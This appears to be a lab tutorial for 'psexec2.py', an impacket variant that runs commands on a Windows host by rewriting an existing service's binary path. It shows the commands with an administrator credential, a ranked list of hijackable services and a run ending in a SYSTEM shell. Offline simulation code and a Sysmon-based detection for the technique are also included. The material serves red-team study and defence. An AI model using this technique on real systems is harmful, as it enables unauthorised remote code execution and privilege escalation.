This code is written against impacket 0.13. If your machine has impacket 0.12, run the following command first so the logger call stays compatible:
sed -i "s/logger\.init(\s*options\.ts\s*,\s*options\.debug\s*)/logger.init(options.debug)/" psexec2.py
Then locate serviceinstall.py in your local impacket package and place servicechange.py in the same directory:
┌──(wackymaker㉿kali)-[/usr/lib/python3/dist-packages/impacket/examples]
└─$ dir
1.py logger.py os_ident.py rpcdatabase.py serviceinstall.py
__init__.py mssqlshell.py __pycache__ secretsdump.py smbclient.py
ldap_shell.py ntlmrelayx remcomsvc.py servicechange.py utils.py
You can use -service-list to print the services on the target whose binary path can be changed:
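Before the real listing, here is the kind of filtering and ranking that produces a table like the one below, as an added example that is not psexec2.py's own code. It runs over constructed QueryServiceConfig/QueryServiceStatus-style records; the weights (DISABLED before MANUAL, LocalSystem before LocalService before NetworkService), the sample service records and the non-candidates (a running auto-start service, a service whose config query returned rpc_s_access_denied) are assumptions chosen to reproduce the shape of the page's table, not psexec2.py's actual scoring.

```python
# Added example, not psexec2.py's code: rank candidate services for a binary-path
# hijack from constructed QueryServiceConfig/QueryServiceStatus records. The weights
# below are an assumption, not psexec2.py's real scoring.
from dataclasses import dataclass

# winsvc.h constants
SERVICE_AUTO_START = 2
SERVICE_DEMAND_START = 3        # shown as MANUAL by sc.exe and in the table
SERVICE_DISABLED = 4
SERVICE_STOPPED = 1
SERVICE_RUNNING = 4

START_TYPE_NAMES = {SERVICE_AUTO_START: "AUTO",
                    SERVICE_DEMAND_START: "MANUAL",
                    SERVICE_DISABLED: "DISABLED"}
STATE_NAMES = {SERVICE_STOPPED: "STOPPED", SERVICE_RUNNING: "RUNNING"}


@dataclass
class ServiceRecord:
    name: str
    start_type: int
    state: int
    start_name: str          # account the SCM starts the service as
    queryable: bool = True   # False models rpc_s_access_denied on QueryServiceConfig


def priority(svc: ServiceRecord):
    """Lower is better; None means the service is not a usable target."""
    if not svc.queryable:
        return None            # cannot read its config, so cannot safely rewrite it
    if svc.state != SERVICE_STOPPED:
        return None            # a live service would have to be stopped first
    if svc.start_type == SERVICE_AUTO_START:
        return None            # auto-start services are noisy and come back at boot
    score = 1 if svc.start_type == SERVICE_DISABLED else 2
    acct = svc.start_name.lower()
    if acct == "localsystem":
        score += 0             # payload runs as SYSTEM
    elif acct.endswith("\\localservice"):
        score += 1             # payload runs with fewer privileges
    elif acct.endswith("\\networkservice"):
        score += 2
    else:
        score += 3             # virtual or custom accounts: privileges unknown
    return score


def suitable_services(records):
    """Return (name, start type, status, account, priority) rows, best first."""
    rows = []
    for svc in records:
        p = priority(svc)
        if p is not None:
            rows.append((svc.name, START_TYPE_NAMES[svc.start_type],
                         STATE_NAMES[svc.state], svc.start_name, p))
    rows.sort(key=lambda r: (r[4], r[0].lower()))   # priority, then name as in the table
    return rows


# Constructed sample: a few services from the listing below plus two non-candidates
SAMPLE = [
    ServiceRecord("ssh-agent", SERVICE_DISABLED, SERVICE_STOPPED, "LocalSystem"),
    ServiceRecord("msiserver", SERVICE_DEMAND_START, SERVICE_STOPPED, "LocalSystem"),
    ServiceRecord("ALG", SERVICE_DEMAND_START, SERVICE_STOPPED, "NT AUTHORITY\\LocalService"),
    ServiceRecord("WMPNetworkSvc", SERVICE_DEMAND_START, SERVICE_STOPPED, "NT AUTHORITY\\NetworkService"),
    ServiceRecord("Spooler", SERVICE_AUTO_START, SERVICE_RUNNING, "LocalSystem"),
    ServiceRecord("PrintWorkflowUserSvc_ac2c1", SERVICE_DEMAND_START, SERVICE_STOPPED,
                  "NT AUTHORITY\\LocalService", queryable=False),
]

if __name__ == "__main__":
    for name, start, status, acct, prio in suitable_services(SAMPLE):
        print(f"{name:<32}{start:<10}{status:<9}{acct:<30}{prio}")
```

The access-denied case matters in practice: a per-service security descriptor can let you enumerate a service but not read or change its configuration, which is exactly what the rpc_s_access_denied lines in the listing below show, so those services are dropped rather than guessed at.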
┌──(wackymaker㉿kali)-[~/test]
└─$ python3 psexec2.py test.com/administrator:'wackymaker$263389'@192.168.174.154 -service-list
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Listing services on 192.168.174.154
[*] Listing all services on 192.168.174.154.....
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service 1394ohci
[*] Querying service 3ware
[*] Querying service ACPI
.............
[*] Querying service cbdhsvc_ac2c1
[*] Querying service CDPUserSvc_ac2c1
[*] Querying service ConsentUxUserSvc_ac2c1
[*] Querying service CredentialEnrollmentManagerUserSvc_ac2c1
[-] Error getting service info for CredentialEnrollmentManagerUserSvc_ac2c1: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Querying service DeviceAssociationBrokerSvc_ac2c1
[-] Error getting service info for DeviceAssociationBrokerSvc_ac2c1: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Querying service DevicePickerUserSvc_ac2c1
[*] Querying service DevicesFlowUserSvc_ac2c1
[*] Querying service PimIndexMaintenanceSvc_ac2c1
[*] Querying service PrintWorkflowUserSvc_ac2c1
[-] Error getting service info for PrintWorkflowUserSvc_ac2c1: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Querying service UdkUserSvc_ac2c1
[*] Querying service UnistoreSvc_ac2c1
[*] Querying service UserDataSvc_ac2c1
[*] Querying service WpnUserService_ac2c1
[*] Suitable for hijacking: 22
========================================================================================================================
SUITABLE SERVICES FOR HIJACKING - 192.168.174.154
========================================================================================================================
SERVICE NAME START TYPE STATUS ACCOUNT PRIORITY
------------------------------------------------------------------------------------------------------------------------
AppVClient DISABLED STOPPED LocalSystem 1
SensorDataService DISABLED STOPPED LocalSystem 1
ssh-agent DISABLED STOPPED LocalSystem 1
UevAgentService DISABLED STOPPED LocalSystem 1
WSearch DISABLED STOPPED LocalSystem 1
diagnosticshub.standardcollect MANUAL STOPPED LocalSystem 2
msiserver MANUAL STOPPED LocalSystem 2
NtFrs MANUAL STOPPED LocalSystem 2
RpcLocator MANUAL STOPPED LocalSystem 2
SecurityHealthService MANUAL STOPPED LocalSystem 2
SgrmBroker MANUAL STOPPED LocalSystem 2
TieringEngineService MANUAL STOPPED localSystem 2
vmvss MANUAL STOPPED LocalSystem 2
wmiApSrv MANUAL STOPPED localSystem 2
ALG MANUAL STOPPED NT AUTHORITY\Lo 3
SNMPTRAP MANUAL STOPPED NT AUTHORITY\Lo 3
NetTcpPortSharing MANUAL STOPPED LocalSystem 4
PerfHost MANUAL STOPPED NT AUTHORITY\Lo 4
RSoPProv MANUAL STOPPED LocalSystem 4
edgeupdatem MANUAL STOPPED LocalSystem 13
MicrosoftEdgeElevationService MANUAL STOPPED LocalSystem 13
WMPNetworkSvc MANUAL STOPPED NT AUTHORITY\Ne 14
========================================================================================================================
Total suitable services: 22
========================================================================================================================

Next, -service-change takes the hijack branch: instead of creating a new service, it changes the binary path of an existing one.
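Here is the hijack branch walked end to end (back up the service, rewrite its binary path, start it, stop it, restore it), as an added example that is neither psexec2.py's nor impacket's code. To run offline it uses a small in-memory stand-in for the Service Control Manager; on a real host each step maps onto an MS-SCMR call (RQueryServiceConfigW, RChangeServiceConfigW, RStartServiceW, RControlService). FakeScm, the service names and the payload path are assumptions. Two details worth noticing that the run below does not spell out: a DISABLED service cannot be started at all (ERROR_SERVICE_DISABLED), so the rewrite must also flip it to demand-start and put the original start type back afterwards; and ChangeServiceConfig treats an empty or NULL binary path as "no change", so a restore driven by a backup with an empty path would silently leave the payload in place.

```python
# Added example, not psexec2.py's or impacket's code: the -service-change flow
# against an in-memory stand-in for the SCM. FakeScm and all names are assumptions.

SERVICE_DEMAND_START = 3
SERVICE_DISABLED = 4
SERVICE_NO_CHANGE = 0xFFFFFFFF      # winsvc.h: leave this field as it is
ERROR_SERVICE_DISABLED = 1058


class FakeScm:
    """Holds per-service config plus a running flag; mimics the SCM semantics used here."""

    def __init__(self, services):
        self._svc = {name: dict(cfg, running=False) for name, cfg in services.items()}

    def query_config(self, name):
        c = self._svc[name]
        return {k: c[k] for k in ("binary_path", "start_type", "start_name")}

    def change_config(self, name, binary_path=None, start_type=SERVICE_NO_CHANGE, start_name=None):
        c = self._svc[name]
        # Like ChangeServiceConfig: None / SERVICE_NO_CHANGE leaves a field untouched.
        if binary_path is not None:
            c["binary_path"] = binary_path
        if start_type != SERVICE_NO_CHANGE:
            c["start_type"] = start_type
        if start_name is not None:
            c["start_name"] = start_name

    def start(self, name):
        c = self._svc[name]
        if c["start_type"] == SERVICE_DISABLED:
            raise OSError(ERROR_SERVICE_DISABLED, "The service cannot be started because it is disabled")
        c["running"] = True
        return c["binary_path"]          # the image the SCM would launch

    def stop(self, name):
        self._svc[name]["running"] = False

    def is_running(self, name):
        return self._svc[name]["running"]


def backup_config(scm, name):
    """Snapshot the fields the hijack rewrites; refuse a snapshot that cannot restore."""
    cfg = scm.query_config(name)
    if not cfg["binary_path"]:
        raise ValueError(f"{name}: backup has an empty binary path, will not proceed")
    return cfg


def restore_config(scm, name, original):
    # An empty path would be treated as "no change" by ChangeServiceConfig, so a bad
    # backup would leave the payload path in place. Guard before writing.
    if not original.get("binary_path"):
        raise ValueError(f"{name}: refusing to restore an empty binary path")
    scm.change_config(name, binary_path=original["binary_path"],
                      start_type=original["start_type"], start_name=original["start_name"])


def hijack_and_run(scm, name, payload_path):
    """Launch payload_path under `name`, then put the service back exactly as found."""
    original = backup_config(scm, name)
    # A DISABLED service cannot be started, so the rewrite must also make it
    # demand-start; restore_config puts the original start type back.
    start_type = SERVICE_DEMAND_START if original["start_type"] == SERVICE_DISABLED else SERVICE_NO_CHANGE
    scm.change_config(name, binary_path=payload_path, start_type=start_type)
    try:
        launched = scm.start(name)
    finally:
        scm.stop(name)                   # "Stopping hijacked service after command execution"
        restore_config(scm, name, original)
    return launched


# Constructed target: ssh-agent as -service-list showed it (DISABLED, LocalSystem).
def build_target():
    return FakeScm({"ssh-agent": {"binary_path": "C:\\Windows\\System32\\OpenSSH\\ssh-agent.exe",
                                  "start_type": SERVICE_DISABLED, "start_name": "LocalSystem"}})


if __name__ == "__main__":
    scm = build_target()
    before = scm.query_config("ssh-agent")
    image = hijack_and_run(scm, "ssh-agent", "C:\\Windows\\System32\\dVCRvXEW.exe")
    print("launched:", image)
    print("restored cleanly:", scm.query_config("ssh-agent") == before)
```

The restore runs in a finally block so that a failed start (for example the access-denied case from the listing) still puts the original configuration back; on a real engagement keep a copy of the backed-up values off the target as well, since they are the only record of what "original" was.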
┌──(wackymaker㉿kali)-[~/test]
└─$ python3 psexec2.py test.com/administrator:'wackymaker$263389'@192.168.174.154 -service-change ssh-agent
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Executing command via service hijacking: cmd.exe
[*] Using specified service: ssh-agent
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service ssh-agent
[*] Selected service for hijacking: ssh-agent
[*] Preparing service hijacking...
[*] Checking if service needs restoration to original state...
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service ssh-agent
[*] Service appears to be hijacked, attempting to restore original configuration...
[*] Restoring original service configuration for ssh-agent...
[*] Stopping service ssh-agent before restoration...
[*] Opening SVCManager on 192.168.174.154.....
[*] Opening SVCManager on 192.168.174.154.....
[*] Restoring service configuration...
[*] - Binary Path:
[*] - Start Type: 3
[*] - Start Name: LocalSystem
[*] Service configuration restored successfully
[*] Service restored to default configuration
[*] Backing up configuration for service ssh-agent
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service ssh-agent
[*] Service backup completed:
[*] - Binary Path: C:\Windows\System32\OpenSSH\ssh-agent.exe
[*] - Start Type: 3
[*] - Start Name: LocalSystem
[*] Using default RemComSvc executable
[*] Requesting shares on 192.168.174.154.....
[*] Found writable share ADMIN$
[*] Uploading file <impacket.examples.remcomsvc.RemComSvc object at 0x7f72a3f616d0> to System32\dVCRvXEW.exe
[*] File uploaded successfully
[*] Hijacking service ssh-agent with payload: C:\Windows\System32\dVCRvXEW.exe
[*] Opening SVCManager on 192.168.174.154.....
[*] Service configuration modified successfully
[*] Starting service to execute payload...
[*] Service hijacked successfully, now executing command...
[*] Executing command through hijacked service...
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [�汾 10.0.20348.169]
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) Microsoft Corporation����������Ȩ����
C:\Windows\system32>chcp 65001
Active code page: 65001
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
On a normal exit the service is restored, so the environment is left as it was. One caveat: the backup above recorded Start Type 3 (MANUAL), while -service-list had shown ssh-agent as DISABLED. The "restoration" that ran before the backup had already changed the start type, and it is the backed-up values that get restored, so the service does not come back in its pre-run state. Check the backed-up values before relying on the restore.
C:\Windows\system32>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Stopping hijacked service after command execution...
[*] Opening SVCManager on 192.168.174.154.....
[*] Service ssh-agent stopped successfully

This hijack path accepts all of psexec.py's original parameters, including -file, -c, -path and so on.
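From the defender's side, the same run leaves a distinct trace, shown here as an added example that is not part of the page or of psexec2.py. Because no service is created, System event 7045 ("A service was installed in the system") never fires; what does appear is services.exe writing the ImagePath value under HKLM\SYSTEM\CurrentControlSet\Services\<name> when the binary path is changed (Sysmon Event ID 13, registry value set), once for the payload and once more for the restore. The detection below compares each ImagePath write against a baseline and keeps an alert even when the value is put back. The baseline, the JSON field layout and the sample events are constructed assumptions.

```python
# Added example, not the page's or psexec2.py's code: flag service ImagePath rewrites
# (Sysmon Event ID 13) that leave the baseline, and record when they are put back.
# Baseline values, field names and SAMPLE_EVENTS are constructed assumptions.
import json
import re

IMAGEPATH_RE = re.compile(r"\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)

# Expected ImagePath per service, e.g. exported from a golden image (assumed values).
BASELINE = {
    "ssh-agent": r"C:\Windows\System32\OpenSSH\ssh-agent.exe",
    "msiserver": r"C:\Windows\system32\msiexec.exe /V",
}


def detect_imagepath_hijacks(lines, baseline=BASELINE):
    """Return one alert per ImagePath write that differs from the baseline.

    A later write that restores the baseline value (the tool's restore step) is
    recorded on the open alert as `restored` instead of clearing it.
    """
    alerts = []
    open_alerts = {}
    for raw in lines:
        ev = json.loads(raw)
        if ev.get("EventID") != 13:
            continue
        m = IMAGEPATH_RE.search(ev.get("TargetObject", ""))
        if not m:
            continue                      # other value under the service key, e.g. Start
        svc = m.group(1)
        expected = baseline.get(svc)
        if expected is None:
            continue                      # not covered by this baseline rule
        new_path = ev.get("Details", "")
        if new_path.lower() != expected.lower():
            alert = {"service": svc, "time": ev["UtcTime"], "writer": ev.get("Image"),
                     "new_path": new_path, "expected": expected, "restored": None}
            alerts.append(alert)
            open_alerts[svc] = alert
        elif svc in open_alerts:
            open_alerts.pop(svc)["restored"] = ev["UtcTime"]
    return alerts


# Constructed Sysmon records mirroring the ssh-agent run: start type flip, path
# rewrite, payload process start, path restored.
SVC_KEY = r"HKLM\System\CurrentControlSet\Services\ssh-agent"
SAMPLE_EVENTS = [
    json.dumps({"EventID": 13, "UtcTime": "2025-01-01 10:00:00.000", "Image": r"C:\Windows\system32\services.exe",
                "TargetObject": SVC_KEY + r"\Start", "Details": "DWORD (0x00000003)"}),
    json.dumps({"EventID": 13, "UtcTime": "2025-01-01 10:00:00.010", "Image": r"C:\Windows\system32\services.exe",
                "TargetObject": SVC_KEY + r"\ImagePath", "Details": r"C:\Windows\System32\dVCRvXEW.exe"}),
    json.dumps({"EventID": 1, "UtcTime": "2025-01-01 10:00:01.000", "Image": r"C:\Windows\System32\dVCRvXEW.exe",
                "ParentImage": r"C:\Windows\system32\services.exe"}),
    json.dumps({"EventID": 13, "UtcTime": "2025-01-01 10:00:30.000", "Image": r"C:\Windows\system32\services.exe",
                "TargetObject": SVC_KEY + r"\ImagePath", "Details": r"C:\Windows\System32\OpenSSH\ssh-agent.exe"}),
]

if __name__ == "__main__":
    for alert in detect_imagepath_hijacks(SAMPLE_EVENTS):
        print(alert)
```

A baseline comparison is used rather than a "random-looking file name" heuristic because the payload name is under the operator's control (-file and -c let it be anything), while the ImagePath write by services.exe is inherent to the technique.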